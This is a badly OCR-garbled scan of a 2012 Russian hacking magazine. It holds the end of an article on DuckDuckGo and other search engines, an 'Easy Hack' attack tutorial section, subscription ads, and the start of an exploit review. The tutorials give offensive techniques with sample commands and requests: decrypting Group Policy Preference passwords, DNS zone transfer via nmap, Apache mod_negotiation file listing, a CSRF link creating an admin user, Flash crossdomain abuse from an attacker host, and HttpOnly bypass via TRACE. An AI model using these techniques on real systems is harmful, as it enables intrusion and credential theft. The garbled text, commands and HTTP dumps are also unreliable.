сот:), которое редиректит посетителя на 
защищенную 551-версию сайта — Шрз:// 
бисксіііскдо.сот. 

Поисковиком можно пользоваться черезТог. 
Адрес внутри сети — Зд2ирІ4рд6кик4т.опіоп. 



РРб можно использовать как прокси. 

Команда « ! ргоху адрес-сайта» 
позволяет зайти на любой сайт через 
прокси. Для этой цели ОискОискбо использу- 
ет различные бесплатные прокси (что, правда, 
плохо сказывается на скорости). 



Много дополнительных плюшек. 

Гики любят ОискОискбо, поэтомунет 
ничего удивительного в появлении 
вспомогательных инструментов, которые 
могут сделать работу с поисковиком еще 
удобнее. Уже сейчас есть специальные 
мобильные приложения для АпбгоісІ и і 05 
(другие в разработке). Поиск можно встроить 
прямо в систему с помощью проектов вроде 
МиШ5еекег ( ЬіГІѵ/сПіЫѴР ). Также есть 
несколько аддонов для популярных браузе- 
ров. Создатели даже подняли чатбота (уе.дд/ 
сЬаіЬоі), который работает через ХМРР 
РаЬЬег). Результаты можно получить 
моментально, отправив сообщение на адрес 
ітйсісід.дд. ПИ 



РЕТРОСПЕКТИВА 



ОискОискбо — проект одного единственного 
энтузиаста Гэбриела Вайнберга. Лишь 
после получения инвестиций у поисковика 
появилось несколько постоянных сотрудников 
и собственный офис в американском городе 
Паоли. Гэбриел — выходец из Массачусетского 
технологического института (МІТ). Поисковик 
для него — далеко не первый проект. Его 
социальную сеть ТИе Матез ОаІаЬазе купила 
компания ІІпіІесІ Опііпеза 10000000 долларов 
США. Изначально ОискОискбо самостоятельно 
финансировался лично Вайнбергом, но сейчас 
существует также и за счет небольшого 
количества рекламы (которую, напоминаем, 
можно отключить). Пожертвований проект не 



принимает. «Это было бы неправильно, ведь 
мы некоммерческая компания», — поясняется 
на сайте. Вместо сіопаіе'ов пользователям 
предлагают активнее нести информацию 
о ОискОискбо людям. 

ОискОискбо написан на РегІ и Эаѵабсгір* 
с использованием библиотеки VIII. Для 
обслуживания огромного количества 
клиентов используется связка пдіпх, 

РазіСбІ и тетсасбесі, запущенные РгееВ- 
50 и ІІЬипШ. При этом используются как 
собственные сервера, так и мощности Атаюп 
ЕС2. Для хранения данных используются 
Ро5*дге5СІІ_+ЬисагсІо, СОВ, 5оІг, ВегкеІуОВ, 53. 
Часть исходного кода ОискОискбо открыта 



и доступна любому желающему на біЖиЬ 
( іібиЬ.сот/сІисксіискдо ). 

Откуда взялось это дурацкое название? Оно 
было выбрано практически случайно. В одном 
из интервью Гэбриел пояснил: «На самом деле 
в один прекрасный день оно просто выскочило 
у меня в голове, и просто мне понравилось». 
Возможно, это связано с популярной в США 
детской игрой под названием «биск йиск 
боозе». Кстати, в качестве альтернативы 
глаголу «погуглить» (боодіе іі), Вайнберг 
предлагает использовать «биск іі!» — то есть 
«подакать», если транслитерировать это 
на русский, или «поуткать», если дословно 
перевести :). 



ДРУГИЕ МАЛОИЗВЕСТНЫЕ ПОИСКОВИКИ 



Ыекко 



ВІекко [ Ыекко. сот ) 

Запущен в конце 2010 года. Идея 
ВІекко проста — невозможно 
создать поисковик, который под- 
ходил бы всем, поэтому у каждого 
должна быть возможность влиять 
на результаты поиска. Исполь- 
зует слэштеги для сужения 
области поиска. Например, при 
помощи слэштега «/пеѵѵз» можно 
выполнить быстрый поиск по 
новостным сайтам. Нетакдавно 
«Яндекс» инвестировал в ВІекко 
15 000 000 долларов. 




УаСѵ ( /асѵ.пеі ) 

ПоисковикУаСу работает по прин- 
ципу Р2Р. Хранение поискового 
индекса и обработка запросов 
осуществляются не на цен- 
тральном сервере, а в распре- 
деленной сети пиров Ргееѵѵогісі. 
Присоединиться к сети может 
любой желающий, достаточно 
лишь установить ПО. Конечно, 
здесь царит полная анонимность. 
Распределенная сеть пиров и от- 
крытый код гарантируют УаСу 
устойчивость и защищают его от 
попыток цензуры. 



^иіск 



Іхдиіск ( іхдиіск.сот ) 

Поисковая система компании 
Іхдиіск тоже ставит во главу угла 
анонимность и безопасность 
пользователей. Іхдиіск, как 
и ОискОискбо, не сохраняет ин- 
формацию ни о запросах пользо- 
вателей, ни о них самих. Кстати, 
по утверждениям специалистов 
компании Іхдиіск, их поисковые 
системы первыми на рынке нача- 
ли предлагать 551-шифрование 
(начиная с 2009 года). 






Ждта [ нигма.к ) 

Рунету тоже есть чем похвастать- 
ся. ІЧідта — российская интел- 
лектуальная метапоисковая 
система, первая кластеризующая 
поисковая система в Рунете. 
Осуществляет поиск как по свое- 
му индексу, так и по индексам 
боодіе, УаЬоо, Віпд, «Яндекс», 
РатЫег, АІІаѴізІа, Арог*. Проект 
создан при поддержке факуль- 
тетов ВМиК и психологии МГУ, 
а также Стэндфордского универ- 
ситета. 



ХАКЕР 04/159/2012 



043 






ВЗЛОМ/ ЕА5ѴНАСК 



Алексей «бгеепйод» Тюрин, ОідііаІ Бесигііу (іѵѵіНег.сот/апІуигіп) 




ВЫТАЩИТЬ ИЗ СИСТЕМЫ ПАРОЛЬ ОТ ЛОКАЛЬНОЙ УЧЕТКИ 



ЗАДАЧА 



РЕШЕНИЕ 

Как же давно я не писал о такой прекрасной виндовой фиче, 
как групповые политики! Тема их обхода стала особенно акту- 
альной после появления исследования секьюрити-группы Е5ЕС 

( аоо.Ы/гРТГТ ). 

Для начала давай уточним задачу. Итак, на гипотетической 
рабочей станции нам нужно вытащить и расшифровать пароль 
от локальной учетной записи, которая была создана при помощи 
групповых политик. Если я не ошибаюсь, то начиная с ѴѴіпсІоѵѵз 
Зегѵег 2008 МісгозоІТ ввела специальное расширение для ло- 
кальных политик под названием бгоир Роіісу Ргеіюгепсез (6РР). 

В ѴѴіпсІоѵѵз Ѵізіа и ѴѴіпсІоѵѵз 7 локальные политики поддержива- 
ются нативно, а вот для ХР потребуется поставить специальное 
обновление. Так вот, одной из добавленных функций была воз- 
можность создавать локальные учетные записи для группы до- 
менных хостов. Функция, безусловно, полезная, и, как уверяют 
люди из Е5ЕС, часто используемая администраторами. Воттакие 
учетки мы и научимся доставать. 

Теперь давай посмотрим, где же эти учетки создаются. Для 
этого мы должны найти на контроллере домена раздел «бгоир 
Роіісу Мападетепі» (дртс.тзс). В нем создаем новую по- 
литику, а затем в «І_осаІ ІІзегз апсі бгоирз» ветки «Сотриіег 
СопЛдигаІіоп» — нового пользователя. В процессе создания 
мы указываем пароль и задаем другие стандартные настройки 
аккаунта. После этого при обновлении политик на доменных 
хостах наш пользователь будетуспешно создан. 
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ЕА5Ѵ НАСК 



Дальше ребята из Е5ЕС посмотрели, как все происходит изну- 
три, и как данные о групповых политиках передаются с контрол- 
лера на хосты. Итог оказался вполне предсказуемым. 

При обновлении политик доменный хост залезал на шару 
5Ѵ5Ѵ0І_-домена и скачивал ХМЕ-файл с политикой. В нем как раз 
и находились имя пользователя и пароль. В общем, все стандар- 
тно. Пример такого файла: 

<?хт1 ѵег5Іоп="1.0" епсосИп^="и1:-р-8" ?> 

<(Игоирз с1бісі="{3125Е937 - ЕВ16-4Ь4с-9934-544РС6Р24Р26}"> 



<11зег с15ІсI^"{^Р5Р1855-51Е5-4с^24-8В1А-^9В^Е98ВА1^1} ,, 
пате="МуІ_осаИІ5ег" 
іта§е="0" 

сІіап§есІ= ,, 2011-12-2б 10:21:37 м 
иісІ="{А5ЕЗР388-299С-41Р2-В937-РР5Е638696РР}"> 



<Рпорег1:іе5 асІііоп^'С" Ти11І\Іате^_ м сІезсгір1:іоп =" " 

сра55ЫОГСІ= ,, ]11Іу]ЗѴх8ТУ911:12і12иАи2кРдА/41а'1:Т7б2ы§сІНсІІіы" 
сбап§еІ_о§оп="0" поСІіап§е="0" 
пеѵегЕхріге5="0" асс 1:РІ5а ЫесІ="0" 



зибАиТбогі-Іу^' " 
и5егІ\Іате="МуІ_осаИІ5ег" /> 

</11з ег> 

</Споир5> 

Здесь необходимо уточнить еще несколько моментов. Во- 
первых, данный файл доступен всем доменным пользователям, 
даже непривилегированным. Во-вторых, пароль расшифровать 
очень просто, ведь хотя и используется АЕ5 256, но вот ключ 
прошит в самой ОС, то есть известен априори. На нашем диске 
ты сможешь найти питоновский скрипт для расшифровки таких 
паролей. 

За остальными подробностями советую обратиться к ориги- 
нальному исследованию Е5ЕС. Хотя оно и не является исследова- 
нием в своем первоначальном смысле (это скорее доведение до 
хакерских масс официально описанной фичи), МісгозоІТ в описании 
0Р четко предупреждает, что данные в СРР передаются в незащи- 
щенном виде. 

И что использовать функционал требуется с большой осто- 
рожностью, особенно при создании привилегированных учеток 
в ОС. 



ПОЛУЧИТЬ СПИСОК ХОСТОВ ИЛИ 0Ы5 20ЫЕ ТВАЫ5РЕК 



ЗАДАЧА 



РЕШЕНИЕ 

При проведении любого ИБ-исследования в первую очередь нам 
требуется ответить на вопрос «а кого же атаковать»? Это важно, 
так как практически любая атака чаще всего проводится против 
какой-то организации, у которой может быть очень много ресурсов. 
А нам необходимо определить среди них самое слабое звено или 
наиболее критичный ресурс. 0І\І5-имя хоста может дать прилич- 
ный профит в этом смысле, так как зачастую оно отражает свой 
функциональный смысл. Например, в корпоративных сетях вполне 
могут присутствовать такие имена как «ЬиЬдаІ» или «Ьапк», до ко- 
торых тебе, конечно же, захочется добраться. Как пример, для веба 
можно взять поиск «скрытых» доменов вроде абтіп.ехатріе.сот. 

Одним из простейших методов определения имен хостов 
является обратный 0І\І5-запрос (геѵегзе), когда мы запрашиваем 
у ОІМЗ-сервера имена хостов на основании их ІР-адресов. Однако 
для корпоративок этот метод шумноват, так как необходимо запра- 
шивать имена для всех хостов по очереди, а для веба он не совсем 
оправдан, — домены могут находиться не на смежных ІР-адресах. 
Но если нам повезет, и ОЫЗ-сервер не совсем корректно настро- 
ен, то мы сможем получить всю необходимую информацию разом. 
Да-да, я говорю про йІМЗ 2опе ТгапБ^ег. Для тех, кто не в курсе, эта 
документированная функция йІМЗ предназначена для того, чтобы 
делиться своими записями о зоне. При корректной настройке 2опе 
ТгапБ^ег должен быть разрешен с первичного ОІМЗ-сервера только 
на вторичный, но об этом часто забывают. 

Итак, чтобы получить зону, нам требуется подключиться к 53 
порту ОІМЗ-сервера по протоколу ТСР и создать АХЕР-запрос. 
Практически это можно выполнить, используя только функционал 
стандартной виндовой команды пзіоокир, но практичней всего 
будет использование ІМтар. 

птар --зсгірі: сІпз-гопе-Іігапз-Рег.пзе \ 

- - зсгірі: -аг§з сІп5-20пе-1:пап5-Рег.сІотаіп=<сІотаіп> 

Но все это классика. Приведу в пример небольшое исследова- 
ние, проведенное небезызвестным экспертом НО Мооге. Он про- 
сканировал основные ОІМЗ-серверы от их ТЮ (іор-іеѵеі-сіотаіп: .пеі, 
.огд, .ххх и так далее) и вывел, что многие из них разрешают прово- 




2опе ігапзТег для одного из корневых серверов домена .агра 



дить гопе Ігапзі'ег. Если точнее, то 65 из 312 ТЮ позволяют получить 
все свои записи. Жаль, конечно, что в этом списке отсутствуют .сот 
и .ш, но все равно приятно. Полученный им список на 250 заархи- 
вированных мегабайт можно получить по ссылке доо.дІ/иѴЗІХ . Но 
давай попробуем собрать такой список сами: 

1. Используем стандартную команду пзіоокир. 

2. Выбираем ОІМЗ-сервер от Гугла: зегѵег8.8.8.8. 

3. Выставляемтип искомыхзаписей:5еиуре=І\І5. 

4. Делаемзапроснадоменагра и получаем обслуживающие его 
0І\І5-серверы: агра. 

5. Подключаемся кодномуиз БЫЗ-серверов всписке:зегѵегЬ.гооІ- 
зегѵегз.пеЕ 

6. Трансферим зону для у казанного домена: Із-сІ агра. 

Конечно, агра - это так, для забавы, много интересной инфор- 
мации мы не получим. Но общая идея, думаю, понятна. 
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ВЗЛОМ/ ЕА5ѴНАСК 



ПРОСМОТРЕТЬ ЛИСТИНГ ФАЙЛОВ В АРАСНЕ 



ЗАДАЧА 



РЕШЕНИЕ 

Для начала давай представим себе ситуацию, что мы исследуем 
какой-то сайт. На этом сайте крутится АрасЬе. Первым делом же- 
лательно понять, какой же движок используется нашим ресурсом. 

Если точно определить СМ5, то, используя общеизвестные 
уязвимости, произвести взлом будет очень просто. Но если это 
что-то нестандартное и без доступных исходников, то могут воз- 
никнуть проблемы. Хотя многое зависит от самого приложения. 

В любом случае я не думаю, что нужно сразу же погружаться 
в дебри взлома, стоит еще немного пособирать информацию. Что 
мы ищем? Любые полезные нам данные. Например, исходники, 
файлы бэкапов, конфиги. Как искать? 

Первым делом желательно и обязательно проверить возмож- 
ность листинга директорий на сервере, и, если она присутствует, 
мы сразу поймем, что можем получить. Например, на одном из 
сайтов, с которыми я когда-то имел дело, как раз и присутствовал 
такой листинг, а в самом приложении, как оказалось, находилось 
всего пара рЬр-скриптов, которые просто подгружали осталь- 
ной функционал из іпс-файлов. Так как файлы типа іпс АрасЬе 
не считает какими-то уж особенными и позволяет их абсолютно 
спокойно скачивать, то я очень быстро и легко получил почти 
все исходники сайта. Но так везет не всегда. А что делать, если 
листинга нет? Классика пентеста - это брутфорс по словарю. Не- 
когда я писал об этом и упоминал тулзу ОігВизІег. Но брутфорс — 
штука грубая, хотя и вполне рабочая. 

Но давай ближе к теме. Всем известный веб-сервер АрасЬе 
содержит интересный модуль под названием тосІ_педаІіаІіоп. 
Данное расширение чаще всего включено по дефолту. Если 
говорить по-простому, то отвечает оно за «умную отдачу контен- 
та». То есть, если пользователь запрашивает какой-то ресурс 
(страницу), то ему будет отдаваться страница, которая подходит 
больше всего. Например, если на сервере хранится пара файлов 



Іюо.Ыт.еп и Іюо.Ыт.сІе, то по запросу Лоо.Ыт будет отдан тот, 
который совпадает с пришедшим от клиента заголовком «Ассері- 
І_апдиаде». 

Но еще более интересным является поведение модуля с ис- 
пользованием параметра МиШѴіеѵѵз. Если он включен, то при 
тестовом запросе «Іюо» АрасЬе проводит поиск в данной дирек- 
тории по маске «Іюо.*», а потом отдает пользователю «наилучший 
вариант». 

Включение МиШѴіеѵѵз производится за счетзаписи строки 
Орііопз МиІіѴіеѵѵз в секции виртуальных хостов или конкретных 
директорий. Хорошо, но что же все это нам дает? Тебе ответит ИБ- 
исследователь Стефано Ди Паола (Біе^апо йі Раоіа, аоо.д 1/1ѵ8Н К ): 
частичный листинг файлов. Как? Все очень просто. В 2007 году 
Стефано помучал данный функционал и выявил, что при уста- 
новке некорректного заголовка «Ассері» при запросе к серверу 
последний с помощью логики тосІ_педаІіаІіоп вернет нам список 
абсолютно всех файлов с запрашиваемым именем, так как не 
сможет выбрать «лучший вариант». Смотри, если мы запраши- 
ваем файл Іюо без расширения, но с заголовком «Ассері», то нам 
вернется «наилучший» вариант: 

Запрос 

6ЕТ /-Роо НТТР/1.1 
Ассері:: */* 

Ответ 

НТТР/1.1 200 ОК 
Бепѵег: Арасбе/2.0.55 
Соп1:еп1:-І-оса1:іоп: -Роо.рНр 
Ѵагѵ: пе^оіііаііе. ассері: 

ТСІМ: сбоісе 



ЬіЧрріЧ ,,>псаі . _ . . іі ЙО 

Ьы /Гео НТТІѴ1.1 
Нсізй 

йссерС : МИЛ /КАК А КА 



НТТР/І.1 Ня* АгсйрСлМ* 

Ласе: Ргі- РеЬ 2012 іі:П4=26 СМТ 
Всгѵсіг- Аланіи; 

рКетдС»? .Ътк 1 ' І < С < ІепдсІ! 0>>^ ("Гов-рЬр” і {(ш** а.эд11сАГ1вп/ г к-> 

> 

М л і'іГ - іліе ^іссерЪ^ЙсссрІ- Еп со сіі пу 

ТСМ: Іі**; 

Сап й е-пі - ІіЮ п д Ь Ь • 1У1 

СолІЕШ-Турс: Гвяй/ІіСпІ* сКагЕСІ: 

<ТЮОСТУРЕ НТШ РЙВЫС "-//ІЕІІѴ/ШВ НТПЬ 2.0//ЭГ> 

\ Ііі.пІ іи! !> 

<Ы*1*>406 Нпг Іс> 

</1іі:дгі><ЬоіІу> 

ОтіУНок АссгрЬаЫс</1і1 > 

адогйргі&ее к&рі'еаепсаъіоп о г ^ Нс гаэои м* соиЫ рі * ь Ье ІоипА оп сЬіэ і&і-иег.^ 

/р> 

ЛиліІаЫв ѵй і’іапін: 

< и I > 

’Тоо . , 1:ур& аррі ісаі іол^х- Е газ 1і</1 і) 
иіХл ін'йГ =,І Еяя . аррі і с аі і ап/к-Ьс Бріі- р1ф</1 і > 

<Лі1> 

<Ъг> 

Іія Ай и ' . “ и Рт к й ЯГК/лгіДі'гіг. к > 

К^ЪойуХ^№п1> 



Частичный листинг файлов. Бэкап найден - качаем 
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А если мы запрашиваем то же самое, но с некорректным за- 
головком «Ассері», то нам вернется практически полноценный 
листинг: 

Запрос 

СЕТ /Тоо НТТР/1.1 
АссерТ: ххх/ЫаЫа 

Ответ 

НТТР/1.1 406 N01= АссерІіаЫе 
Бепѵеп: Арасбе/2.0. 55 

АГЕегпаІіез: {"-Роо.Ьак" 1 {Туре аррИсаТіоп/х-ТгазІі} {1еп§ТІі 3}}., 
гГ/'Тоо.рбр" 1 

{Туре арр!іса1=іоп/х-Іі1=1=рсІ-рІір> Пеп^ТІі 3>> 



Ѵагу: пе§оТіаТе л ассерТ 
ТСІМ: 1І5Т 



Что это может дать? Конечно, все сильно зависит от ситуации, но 
в основном это попытка добраться до бэкапов. Кстати, ситуации, 



когда файлы бэкапов хранятся рядом, случаются очень часто, - 
многие программы автоматом создают их при редактировании 
основных файлов. Важным ограничением способа является то, 
что в вывод веб-сервера попадают только те файлы, чье рас- 
ширение присутствует в конфиге апача (АсИТуре). То есть файл 
с расширением .рЬр~ в листинг, к сожалению, не попадет. 

Думаю, здесь важно подчеркнуть, что описанное выше по- 
ведение АрасЬе — нормально. То есть разработчики не собираются 
менять его. И какуже было сказано выше, это свойственно всем 
основным веткам АрасЬе. Хотя данная фича в любом случае не 
избавляет нас от необходимости перебора, но мы вполне можем 
воспользоваться уже имеющимися данными (именами страниц) 
и не перебирать вслепую. 

В Меіазріоіі присутствует соответствующий модуль (аихіііагу/ 
зсаппег/Шр/тосІ_педоЕіаЕіоп_ЬгиЕе), проводящий брутфорс с уче- 
том этой фичи, да и сканер от Асипеііх имеет аналогичный функ- 
ционал. В качестве простейшего примера - чекер тосІ_педоІіаІіоп 
с использованием птар: 

птар - -зсгір'Е=Іі'Е'Ер-арасІіе-пе§о'Еіа'Еіоп -р8Ѳ -зѴ 



ВЫПОЛНИТЬ ДЕЙСТВИЯ ОТ ИМЕНИ 
ПОЛЬЗОВАТЕЛЯ В КАКОЙ-ЛИБО СМ5 



ЗАДАЧА 



РЕШЕНИЕ 

Для начала давай расширим задачу. Есть пользователь, залоги- 
нившийся в какую-нибудь веб-систему (например в админку). Есть 
хакеры, которые хотят получить привилегированный доступ в эту 
систему. Для приличия добавим возможность подсунуть этому 
пользователю произвольную ссылку или проснифать его незашиф- 
рованный трафик (хотя сама админка будет находиться за Ьирз'ом). 
Самый простой и действенный способ — это, наверное, С5РЕ: 

ІтЕ'Ерз : //ѵісЕіт. сот/асітіп. рІір?асІсІи5ег=1&и5ег=Ііаскег& 
раз5ЫогсІ=Тіаскег 

Если мы заставим браузер перейти по этой ссылке, то в системе 
будет создан новый пользователь. Но это возможно только в том 
случае, если веб-приложение уязвимо к таким атакам. К счастью, 
во все большее количество ПО внедряются всяческие механизмы 
защиты от С5РР. Самый распространенный -токены. К каждому за- 
просу на странице добавляется токен, который действителен толь- 
ко для одного запроса. Таким образом мы получаем ссылку вида 

ІтЕ^рз : //ѵісЕіт . сот/асітіп . рИр?асІсІи5ег=1&и5ег=Ііаскеп& 
ра55ыогсІ=Ііаскег&'Еокеп=1оп^ папсіот Ьикѵа сі-Рга 

Да, С5РР уже не прокатит. Что дальше? Конечно же, Х55. С по- 
мощью этого вида атак мы сможем загрузить нужную страницу, 
вынуть токен и создать ядовитый запрос (плюс много еще всякого 
страшного). Но у Х55 есть пара проблемных моментов. Хотя они 
и являются самым распространенным видом багов на сегодняшний 
день, но в основном это касается геПесІеб Х55 (то есть когда код 
попадает из запроса), ведь зЕогесІ Х55 (когда мы можем добавить 
контент в страницу) бывает не часто. Но во многие браузеры натив- 
но или с помощью плагинов встроена хорошая защита от геРІесЕесІ 
Х55. Классический пример - ІЕ. И здесь без извращений и/или 
социальной инженерии защиту не обойти. 

Давай посмотрим, можем ли мы сделать что-то еще? Ответ - 
НазЬ. У него есть несколько плюсов. Во-первых, сейчас он стоит по 



дефолту на всех компьютерах (привет яблочникам :). А во-вторых, 
предоставляет много возможностей по взаимодействию с сетью. 

В самом простом виде атака с использованием ЛазЬ будет иметь 
следующий вид. Есть еѵіі.сот -хост атакующего со специальной 
флэшкой, и есть ѵісііт. сот с нужными нам данными. Когда юзер 
зайдет к нам на еѵіі.сот, флэш автоматически запустится и вы- 
полнит загрузку страницы сѵісііт.сот, причем используя родные 
кукисы пользователя! Далее все стандартно, - из страницы доста- 
ем токен, подставляем его в запрос и выполняем. 

Все круто? Как бы ни так. Здесь нам мешают зате огідіп 
роіісіез. Ведь еѵіі.сот - один домен, ѵісііт. сот - другой, а следова- 
тельно взаимодействие по флэшу запрещено. Однако существует 
и вполне легальный способ, разрешающий такое «общение», — это 
файл сгоззсіотаіп.хті. В нем указывается, что можно делать флэ- 
шу. Он должен быть расположен в самом корне сервера ѵісііт.сот. 
Таким образом, когда флэш-ролик пытается прочитать страничку 
с ѵісііт.сот, флэш сначала читает ѵісііт.сот/сгоззсіотаіп.хті и на 
основе него уже делает вывод, разрешено ли подключаться к этой 
странице. В настоящий момент флэш поддерживает целый набор 
ограничений. Я не буду описывать все, коснусь лишь основных, 
общая спецификация от асІоЬе находится по адресу доо.дІ/А02Р1. 
Вот пример: 

<?хш1 ѵег5Іоп="1.Ѳ"?> 

сЮОСТѴРЕ сгозз-сіотаіп-роіісу 5Ѵ5ТЕМ 

"ІгЕ1:р://ыыы. асІоЬе. сот/хт1/сИ:сІ5/сго55-сІотаіп-ро1ісу.сІ1:сІ ,, > 
<сгозз-сІотаіп-ро1ісу> 

<зі-Ее-соп1:го1 

репті'Е1:есІ-сго5 5-сІотаіп-ро1ісіе5="і , па5І:ег-оп1у"/> 
<а11оы-ассезз--Ргот с!отаіп="* . ѵісЕіт. сот" зесиге="-Ра1зе"/> 
<а11оы-ассезз--Ргот сІотаіп="ыыы. тісгозоТі: . сот"/> 
</сгозз-сІотаіп-ро1ісу> 

Поясню некоторые моменты. Главный пункт здесь, конечно 
же, это аІІоѵѵ-ассезз-Ітот, указывающий на то, с каких серверов 
доступ разрешен. Здесь это любые поддомены ѵісііт.сот и один — 
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МісгозоЙ. Мазіег-опіу указывает на то, что используется только 
сгоззсіотаіп.хппі, лежащий в корне, хотя есть и другие варианты, 
но об этом дальше. Воттеперьу нас появляется возможность 
для маневров. Например, с помощью 0145 или МВІЧБ-зрооЛпд мы 
можем представиться одним из поддоменов ѵісЛт.сот и по- 
лучить, таким образом, возможность использовать флэш на 
полную. Кроме того, мы можем искать уязвимости уже во всех 
этих доменах и через них атаковать пользователей ѵісііт.сот. 

Далее нам интересен атрибут зесиге (по-дефолту «Ігие»), 
указывающий на то, нужно ли флэшу обращаться к данному хо- 
сту только с Шрз. То есть в данном случае (^аізе) мы можем про- 
вести на ѵісііт.сот атаку Мап-іп-іЬе-тіббІе, а затем внедрить 
нашу флэшку в НТТР-ответ от сервера. Получается, флэшке 
будет разрешено «общаться» и с Шрз'ом этого домена. 

Также хочу добавить еще несколько важных замечаний. 
Во-первых, когда флэш-ролик отправляет куда-либо запрос, 
то в качестве его родного домена определяется то место, где 
он хостится фактически, а не то, где он вставлен в страницу. 
Во-вторых, при отсутствии сгоззсіотаіп.хті флэшу на самом 
деле не «запрещается все», как считают многие. В таком случае 
флэшу можно указать альтернативный файл политик, назы- 
вающийся по-другому и лежащий на ѵісііт.сот. В-третьих, 
файлы сгоззсіотаіп.хті могут лежать и в папках. Но должно 



быть разрешение от корневого файла (значение директивы 
«зііе-сопігоі» находится не в положении «тазіег-опіу»), а до- 
ступ флэш-ролику будет разрешен только в данную директорию 
или ее поддиректории. Таким образом, у нас есть небольшая 
возможность либо найти альтернативные файлы на ѵісііт.сот, 
либо залить хтГку. 

Кстати, наиболее простым и частым багом здесь является 
неправильное использование директивы оІІоѵѵ-ассезз-Ітот 
ботаіп=»* «>. В данном случае мы можем обращаться к жертве 
с любого из хостов, а также производить почти любые действия 
от чужого имени. Много ли таких сайтов? Прилично. Подроб- 
ности смотри в научной работе про анализ АІеха Тор 50 000 от 
наших коллег из Сан-Диего (доо.дІ/гІСИ). 

Еще хотелось бы вспомнить про такую альтернативу флэшу 
как БіІѵегІідЫ от МісгозоЙ. У них почти аналогичная система 
кроссдоменного взаимодействия, только с несколькими отли- 
чиями. Файл политик называется сііепіассеззроіісу.хті, однако 
если БіІѵегІідЫ его не находит, то ищется сгоззсіотаіп.хті. 

Сам же сііепіассеззроіісу.хті не поддерживает использование 
символа множества («*») для описания доменов и не различает 
Шр- и Шрз-протоколы. Так что через него также можно вы- 
полнять действия от имени пользователя, если только повезет 
с хтГками. 



ОБОЙТИ ФЛАГ С00КІЕ5 НТТРОЫІ.Ѵ 



ЗАДАЧА 



РЕШЕНИЕ 

Х55 - это одна из самых распространенных ныне уязвимостей 
веб-приложений. К тому же она очень опасна, потому что по сути 
мы можем выполнять почти любые действия от имени пользова- 
теля. Но если все же вернуться к классике, то итогом Х55 долж- 
на быть украденная сессия пользователя. Так как чаще всего 
авторизация юзера происходит именно по кукисам, то целью атаки 
с использованием Х55 является их угон. Чаще всего это можно 
сделать с помощью данных из переменной боситепСсоокіе. Но все 
несколько затруднилось, когда появился такой чудо-браузер, как 
ІЕ6. Разработчики внедрили в него специальный флаг ШрОпІу. 
Основная его задача заключается в том, чтобы указать браузеру, 
что данную куку нельзя доставать из ]‘аѵазсгірІ. Ага, идея хорошая. 
Воттолько с реализацией не так все здорово, ведь по идее флаг 
должны выставлять сами разработчики ПО, которые до сих пор 
этим пренебрегают. 

Теперь давай предположим, что «ЫірОпІу» установлен. Как 
его обойти? Бородатый метод - сгозз-зііе Ігасіпд. Придуман он 
аж в 2003 году и основан на том, что многие веб-серверы наряду 
с 6ЕТ- и РОБТ-методами поддерживают еще и ТРАСЕ-метод. Дан- 
ный метод крайне прост: веб-сервер возвращает полностью весь 
запрос, который был отправлен клиентом. То есть получается так: 
мы должны внедрить через Х55 такой код, который должен будет 
отправить любой запрос на тот же сервер с методом ТРАСЕ, а затем 
прочитать пришедший ответ. В этом ответе кроме искомых кукисов 
могут содержаться и другие интересные данные (Ьазіс или пііт- 
аутентификация). Важно упомянуть, что многие веб-серверы до сих 
пор поддерживают данный метод. 

Кроме всего этого существуют также и несколько зависимых 
от сервера возможностей. Новым и крайне забавным примером 
является АрасЬе. Если точнее, то вся его ветка 2.2 вплоть до вер- 
сии 2.2.22. Логика здесь такая же, как и в случае с ТРАСЕ, только 
куки возвращаются в ответе об ошибке веб-сервера. Норман 
Хипперт (ІЧогтап Ніррегі, доо.ді/пббрѵ ) обнаружил, что при ошибке 
400 (НТТР 400 Ваб Редиезі) возвращается весь отправленный 




АрасЬе 2.2. Большой заголовок приводит к ошибке с раскрытием кукисов 




ТВАСЕ-запрос. Веб-сервер возвращает все, что ему послали. Даже куки 

клиентом запрос. Чтобы создать такой запрос, требуется всего 
лишь отправить легитимный пакет с очень большим заголовком. 

В РоС'е автора используется простейшая реализация этого бага: 
с помощью іаѵазсгірі; он выставляет большое количество длинных 
кукисов и отправляет запрос на сервер. 
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6 номеров — 1110 руб. 
13 номеров — 1999 руб. 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 



ідтеНапй 

ПОДПИШИСЬ! 

зііор.діс.ги 

Редакционная подписка без посредников — 
это гарантия получения важного для Вас 
журнала и экономия до 40% от розничной 
цены в киоске 

8-800-200-3-999 
+7 (495) 663-82-77 (бесплатно) 







6 номеров — 564 руб. 

1 3 номеров — 1105 руб. 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 



6 номеров — 810 руб. 
13 номеров — 1499 руб. 



6 номеров — 1110 руб. 
13 номеров — 1999 руб. 




6 номеров — 630 руб. 

1 3 номеров — 1140 руб. 




6 номеров — 895 руб. 
13 номеров — 1699 руб. 




6 номеров — 1194 руб. 
13 номеров — 2149 руб. 



ХУУ1ИГЛН 




6 номеров — 894 руб. 

1 3 номеров — 1 699 руб. 






6 номеров — 690 руб. 
13 номеров — 1249 руб. 



6 номеров — 775 руб. 
13 номеров — 1399 руб. 



6 номеров — 950 руб. 

1 3 номеров — 1 699 руб. 



6 номеров — 810 руб. 

1 3 номеров — 1 499 руб. 












ВЗЛОМ/ОБЗОР ЭКСПЛОИТОВ 



Павел Александрович (іѵіпзісІе.ЫодзроСсот) 
Дмитрий Михайлович (115612, дер. Красная звездочка, д.1) 





И вновь мы с тобой встречаемся, чтобы разобраться во внутреннем устройстве последних 
интереснейших образцов из области эксплоитостроения. Крепче хватайся за журнал и 
внемли же слогу бинарному... 
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Обзор эксплоитов 



я М512-013: Уязвимость в библиотеке времени 
1 выполнения С (тзѵсгі.сііі) 



. Ііе хі: : 6Р РВЕА2Ѳ ризб еЬх ; то ѵ еЬх. [ езі] іп ібе епіігѵ Ыоск 
. 1= ех1= : 6Р РВЕА21 с аіі са11ос_сг1і 



СѴ53Ѵ2 



9.3 






(АѴ:І\І/АС:М/АІІ:І\І/С:С/І:С/А:С) 



МзѵсгЫІІ — многопоточная библиотека динамической ком- 
поновки ШШ времени выполнения С, которая используется 
компонентами системного уровня. В способе расчета библиоте- 
кой тзѵсгЕсІІІ размера буфера в памяти существует уязвимость, 
которая делает возможным удаленное выполнение кода и по- 
зволяет копировать данные в память, не выделенную должным 
образом. Эта уязвимость делает возможным удаленное выпол- 
нение кода при запуске пользователем специально созданных 
файлов мультимедиа. Если пользователь вошел в систему с 
правами администратора, то злоумышленник, которому уда- 
лось воспользоваться уязвимостью, может установить полный 
контроль над системой, после чего он сможет устанавливать 
программы, просматривать, изменять и уничтожать данные или 
